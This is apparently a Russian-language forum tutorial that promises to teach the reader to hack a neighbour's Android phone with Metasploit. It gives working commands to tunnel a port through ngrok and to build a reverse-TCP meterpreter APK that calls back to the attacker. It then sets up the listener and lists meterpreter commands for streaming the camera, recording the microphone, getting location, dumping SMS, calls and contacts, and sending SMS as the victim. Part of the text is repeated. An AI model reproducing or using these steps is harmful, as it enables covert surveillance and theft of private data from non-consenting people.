Привет, хацкер, сегодня я научу тебя взламывать андроид твоей соседки при помощи Metasploit.
По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по ссылке. Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.
Поднимаем tcp соединение:
Теперь нам нужно создать пейлоад под систему Android'a:
Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):
Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.
Список команд интересных для meterpreter:
По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по ссылке. Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.
Поднимаем tcp соединение:
./ngrok tcp 4444
Теперь нам нужно создать пейлоад под систему Android'a:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19752 R > payload.apk
Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.
Список команд интересных для meterpreter:
- Просмотр камеры в режиме реального времени:
webcam_stream
- Узнать текущую геолокацию:
geolocate
- Дампы: смс, контакты, история звонков:
Код:
dump_sms
dump_calllog
dump_contacts
- Отправка смс от имени жертвы:
send_sms
- Запись микрофона:
record_mic
- Скриншот экрана:
screenshot
- Блокировка экрана:
wakelock